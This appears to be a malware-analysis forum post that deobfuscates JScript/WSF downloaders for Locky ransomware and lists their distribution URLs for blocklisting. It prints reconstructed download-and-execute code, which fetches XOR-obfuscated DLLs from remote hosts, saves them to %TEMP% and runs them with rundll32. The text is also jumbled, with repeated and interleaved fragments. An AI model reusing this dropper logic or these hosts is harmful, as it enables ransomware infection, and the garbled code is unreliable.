=> 77 99 110 85 75 118 52 48 103 107 121 65 90 97 76 111 122 74 77 110 57 88 103 114 52 48 86 71 72 104 98 106
=> none above, or equal, to 128 :
=> then here, the result is an array of char codes of same chars if (OVc9 < 128) {
var HIi3=OVc9;
=> keep the original char code
}=> keep the original char code
else {
var HIi3=t1[OVc9];
=> changes the char code
}=> changes the char code
resultArray["push"](HIi3);
=> "McnUKv40gkyAZaLozJMn9Xgr40VGHhbj"
=> 77 99 110 85 75 118 52 48 103 107 121 65 90 97 76 111 122 74 77 110 57 88 103 114 52 48 86 71 72 104 98 106
=> none above, or equal, to 128 :
= VGRA1(nazadposmotrishvdrugzanzibarloverIamChild);
- nazadposmotrishvdrugzanzibar5FrankSinatra = VGRA6(nazadposmotrishvdrugzanzibar5FrankSinatra);
- VGRA5(nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5FrankSinatra );
First method :
nazadposmotrishvdrugzanzibar5rampart.Run("ru" + ("nazadposmotrishvdrugchicken", "nazadposmotrishvdrugprostate", "nazadposmotrishvdruglogistics", "nazadposmotrishvdruglexicon", "nd") + "l" + (nazadposmotrishvdrugzanzibar5StrokaParam2, "nazadposmotrishvdrugtoken", "nazadposmotrishvdrugunabated", "nazadposmotrishvdrugplacing", "nazadposmotrishvdrugablest", "l32") + " " + nazadposmotrishvdrugzanzibarloverIamChild + ",EnhancedStoragePasswordConfig", 0, false);
=> an obfuscated way to write :
ObjShell.Run("rundll32 " + path_file + ",EnhancedStoragePasswordConfig",0, false)
2-5) Main part :ObjShell.Run("rundll32 " + path_file + ",EnhancedStoragePasswordConfig",0, false)
var nazadposmotrishvdrugzanzibar5HORDA17 = "FhsxVP";
var nazadposmotrishvdrugzanzibarolivia = [
=> This array is used for the run part. We can see the extension used.
path_file :var nazadposmotrishvdrugzanzibarolivia = [
nazadposmotrishvdrugzanzibar5lidgen,
=> "ActiveXObject"
nazadposmotrishvdrugzanzibar5sirdallos,
=> ExpandEnvironmentStrings
nikeFootballAir23("WEAGLEWEAGLEJVRFTWEAGLEWEAGLEVAl"),
=> %TEMP%
".d" + nazadposmotrishvdrugzanzibar5lololosh + nazadposmotrishvdrugzanzibar5lololosh,
=> ".d" + "l" + "l"
nikeFootballAir23("UnWEAGLEWEAGLEVuWEAGLEWEAGLE")
=> "Run"
];=> "ActiveXObject"
nazadposmotrishvdrugzanzibar5sirdallos,
=> ExpandEnvironmentStrings
nikeFootballAir23("WEAGLEWEAGLEJVRFTWEAGLEWEAGLEVAl"),
=> %TEMP%
".d" + nazadposmotrishvdrugzanzibar5lololosh + nazadposmotrishvdrugzanzibar5lololosh,
=> ".d" + "l" + "l"
nikeFootballAir23("UnWEAGLEWEAGLEVuWEAGLEWEAGLE")
=> "Run"
=> This array is used for the run part. We can see the extension used.
=> example : "C:\Users\\DardiM\AppData\Local\Temp\FhsxVP1.dll"
FhsxVP3.dll
etc,...
=> one number by URL until a good payload is found
Second method coded, but not used here :
FhsxVP2.dllFhsxVP3.dll
etc,...
=> one number by URL until a good payload is found
nazadposmotrishvdrugzanzibar5rampart[nazadposmotrishvdrugzanzibar5promises](nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5chosen, true);
=> nazadposmotrishvdrugzanzibar5promises : "Run"
=> nazadposmotrishvdrugzanzibarloverIamChild : path_file
ObjShell.Run(path_file ,1, true);=> nazadposmotrishvdrugzanzibarloverIamChild : path_file
When we follow in the right order what the script is doing (step by step ) :
After a lot vars have been prepared with the real data :
var nazadposmotrishvdrugzanzibar5checheche = ["d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2", "dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2", "Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=",
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2", "ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2", "aW50b21pbS5jb20vZzY3ZWlobnJ2"];
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2", "ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2", "aW50b21pbS5jb20vZzY3ZWlobnJ2"];
=> tab of url_parts (we have seen there are incomplete)
var nazadposmotrishvdrugzanzibar5checheche1 = nazadposmotrishvdrugzanzibar5checheche.slice(0);
=> array of url_parts (we have seen that they are incomplete)
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);
=> function with :
=> nazadposmotrishvdrugzanzibar5pereSubFunc :
- parameter 1 : array of urls_parts
- parameter 2 : the extension to be used : ".dll"
- parameter 3 : true
- parameter 2 : the extension to be used : ".dll"
- parameter 3 : true
=> this function purpose :
- build the whole URls
=> use a sub function nazadposmotrishvdrugzanzibar5_a2
=> use a sub function nazadposmotrishvdrugzanzibar5_a2
- send the request
- save the obfuscated payload received, without extension (first decipher)
- deobfuscates it completely
- save it with the real extension after last decipher, if all is ok
- save the obfuscated payload received, without extension (first decipher)
- deobfuscates it completely
- save it with the real extension after last decipher, if all is ok
function nazadposmotrishvdrugzanzibar5pereSubFunc(
nazadposmotrishvdrugzanzibar5_a5,
=> array of urls_parts
=> the extension to be used : ".dll"
=> Boolean, here : true
) {=> array of urls_parts
nazadposmotrishvdrugzanzibar5_a6, => the extension to be used : ".dll"
nazadposmotrishvdrugzanzibar5_a7=> Boolean, here : true
if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {
}for (nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5) {
}nazadposmotrishvdrugzanzibar5HORDAI++;
try {
}try {
var nazadposmotrishvdrugzanzibar5HORDA6 = nazadposmotrishvdrugzanzibar5jji + nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";
=> "http://"+ nikeFootballAir23(array_of_urls_incomplete[index]) + "?DHVvPTpRF=wqxuXORJf";
if (
=> calls the sub function : returns true or false
} catch (nazadposmotrishvdrugzanzibar5QvLfAvDBhv) {}=> "http://"+ nikeFootballAir23(array_of_urls_incomplete[index]) + "?DHVvPTpRF=wqxuXORJf";
if (
=> calls the sub function : returns true or false
nazadposmotrishvdrugzanzibar5_a2(
) {nazadposmotrishvdrugzanzibar5HORDA6,
=> URL
nazadposmotrishvdrugzanzibar5HORDA17 + nazadposmotrishvdrugzanzibar5HORDAI,
=> "FhsxVP" + current_index
=> example : "FhsxVP1" name for the payload
nazadposmotrishvdrugzanzibar5_a6,
=> ".dll" : extension
nazadposmotrishvdrugzanzibar5_a7
=> true
)=> URL
nazadposmotrishvdrugzanzibar5HORDA17 + nazadposmotrishvdrugzanzibar5HORDAI,
=> "FhsxVP" + current_index
=> example : "FhsxVP1" name for the payload
nazadposmotrishvdrugzanzibar5_a6,
=> ".dll" : extension
nazadposmotrishvdrugzanzibar5_a7
=> true
break;
=> break if true (successful, then no need to try another url)
}=> break if true (successful, then no need to try another url)
Sub function - deobfuscated :function nazadposmotrishvdrugzanzibar5_a2(url, temp_file_name, extension, Param4){
path_file = path + "/" + temp_file_name
=> example : "C:\Users\DardiM\AppData\Local\Temp/FhsxVP1"
=> ("/" => "\")
=> example : "C:\Users\DardiM\AppData\Local\Temp/FhsxVP1"
=> ("/" => "\")
http.open("GET", url, false);
http.setRequestHeader("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
http.send();
=> sends the request
stream = new ActiveXObject("ADODB.Stream");
stream.open();
stream.type= 1;
stream.write(http.ResponseBody);
=> writes the received data to a stream object
stream.position = 0;
stream.saveToFile(temp_file_name, 2);
=> saves the file without extension : obfuscated file
stream.close();
content_file = VAR1(temp_file_name);
=> Loads the file from HD, and call first decipher function
content_file = VAR6(content_file);
=> XOR part
file_length = content_file.length;
if (file_length < 30000) return false;
=> returns to the main function => will try next URL
if (content_file[0] - 3 != 74 || content_file[1] - 5 != 85) return false;
=> 74 + 3 = 77 => M
=> 85 + 5 = 90 => Z
=> if not a good header "MZ" (exe or dll file) : returns to the main function (=> next url)
real_file = temp_file_name + extension;
VAR5(real_file , content_file);
=> second decipher, and saves the file with real name (=> with extension)
if (Param4) {
}
http.setRequestHeader("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
http.send();
=> sends the request
stream = new ActiveXObject("ADODB.Stream");
stream.open();
stream.type= 1;
stream.write(http.ResponseBody);
=> writes the received data to a stream object
stream.position = 0;
stream.saveToFile(temp_file_name, 2);
=> saves the file without extension : obfuscated file
stream.close();
content_file = VAR1(temp_file_name);
=> Loads the file from HD, and call first decipher function
content_file = VAR6(content_file);
=> XOR part
file_length = content_file.length;
if (file_length < 30000) return false;
=> returns to the main function => will try next URL
if (content_file[0] - 3 != 74 || content_file[1] - 5 != 85) return false;
=> 74 + 3 = 77 => M
=> 85 + 5 = 90 => Z
=> if not a good header "MZ" (exe or dll file) : returns to the main function (=> next url)
real_file = temp_file_name + extension;
VAR5(real_file , content_file);
=> second decipher, and saves the file with real name (=> with extension)
if (Param4) {
=> if the Param4 is true (in this sample it is this value) : use of rundll32
objeShell.Run("rundll32 " + real_file + ",EnhancedStoragePasswordConfig", 0, false);
} else {objeShell.Run("rundll32 " + real_file + ",EnhancedStoragePasswordConfig", 0, false);
=> EnhancedStoragePasswordConfig : <entrypoint>
=> if the parameter 4 is false : "normal" run
objeShell.Run(real_file , 1, true);
=> file that can be run
objeShell.Run(real_file , 1, true);
=> file that can be run
return true;
}
3) Conclusion :- Still not difficult to find important data, in this family of script :
- The parts used to deobfuscate the payload
- URLs used
- Payload name
- URLs used
- Payload name
=> find the pattern used to obfuscate some important strings :
=> find replace :
=> or the name of the decoding function, the one you can see several times with a strange string as parameter
Here, it was :
kuloma["replace"](/WEAGLEWEAGLE/g, '')
Example :
nikeFootballAir23("TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=");
=> Find the declaration of nikeFootballAir23 function :
=> looking inside : /WEAGLEWEAGLE/g,
- The same method is used for :27991851_Invoice.jse
FAX_0780.wsf => /VOEVODAHO/g,
=> as easy to retrieve important info (to Black list them)- http: //139.162.29.193/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //sheela.diet/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //www .hayatesabz.ir/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //conceptkitchens.co.uk/g67eihnrv,?mieVBwvCQ=ExHBtOmHHgv
- http: //fliermagas.net/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //intomim.com/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
7171450.wsf- http: //sheela.diet/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //www .hayatesabz.ir/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //conceptkitchens.co.uk/g67eihnrv,?mieVBwvCQ=ExHBtOmHHgv
- http: //fliermagas.net/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //intomim.com/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
=> Payload : mujVqbry1.gll (number : 1 to 6)var nazadposmotrishvdrugnewcomer5HORDA17 = "mujVqbry";
- http: //italics.in/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //www. kimabites.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //dollsdelight.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //bonzerwebsolutions.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //fliermagas.net/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //intomim.com/g67eihnrv?UMPLUb=UHspjGTxBe
=> Payload : MpdhLm1.dll (number : 1 to 6)
var nazadposmotrishvdrugshell5HORDA17 = "MpdhLm";
- http: //www. kimabites.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //dollsdelight.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //bonzerwebsolutions.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //fliermagas.net/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //intomim.com/g67eihnrv?UMPLUb=UHspjGTxBe
=> Payload : MpdhLm1.dll (number : 1 to 6)
var nazadposmotrishvdrugshell5HORDA17 = "MpdhLm";
5190512.wsf- http ://www .kimabites.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
- http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
=> Payload : FhsxVP1.dll (number : 1 to 6)
- http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
- http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
=> Payload : FhsxVP1.dll (number : 1 to 6)
var nazadposmotrishvdrugzanzibar5HORDA17 = "FhsxVP";
For the next, another pattern is used :FAX_0780.wsf => /VOEVODAHO/g,
- http: //armco-inspections.com/7fg3g?iUGfOoaD=goBNFokAlh
- http: //simperizinan.sragenkab.go.id/7fg3g?iUGfOoaD=goBNFokAlh
- http: //davepotterhonda.com.au/7fg3g?iUGfOoaD=goBNFokAlh
- http ://primermundo.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //skartusnea.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //palaschoga.com/7fg3g?iUGfOoaD=goBNFokAlh
The extension is a bit more hidden : same technique but the ".d" was in clear :
Now, here :
- http: //simperizinan.sragenkab.go.id/7fg3g?iUGfOoaD=goBNFokAlh
- http: //davepotterhonda.com.au/7fg3g?iUGfOoaD=goBNFokAlh
- http ://primermundo.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //skartusnea.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //palaschoga.com/7fg3g?iUGfOoaD=goBNFokAlh
=> Payload obfuscated : OpIINzQQQGK1.dll (number : 1 to 6)var opfuagracleansing5HORDA17 = "OpIINzQQQGK";
Now, here :
".d" => "\u002Ed"
var opfuagracleansingolivia = [opfuagracleansing5lidgen, opfuagracleansing5sirdallos,nikeFootballAir23("VOEVODAHOJVRFTVOEVODAHOVAl"), "\u002Ed"+opfuagracleansing5lololosh+opfuagracleansing5lololosh, nikeFootballAir23("UnVOEVODAHOVuVOEVODAHO")];
"\u002Ed"+opfuagracleansing5lololosh+opfuagracleansing5lololosh
"\u002Ed"+opfuagracleansing5lololosh+opfuagracleansing5lololosh
=> ".d + "l" + "l"
=> ".dll"
=> ".dll"
=> Payload : OpIINzQQQGK1.dll (number : 1 to 6)
- payload : Locky ransomware with .thor extension
- EnhancedStoragePasswordConfig is the name of the Entry point
- it uses a parameter ( true or false) to select how shell.Run is used (not the same parameters)=> compatible with dll and exec files
The aim of this post was not to deobfuscate or explain all the parts of this family of script (already done on previous analysis). Just to show how it evolved, with very recent samples (hum I don't think 'evolved ' is the good name )Edited :
last summary (using the steps described in the current thread)
- sample from 04/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/5-x...y-thor-downloaders-updated.64894/#post-561313
-sample from 08/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/6-x...rs-oct-27-to-nov-8-updated.64894/#post-563027
- 2 Samples from 29/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/28-11-2016-20.65943/
Last edited: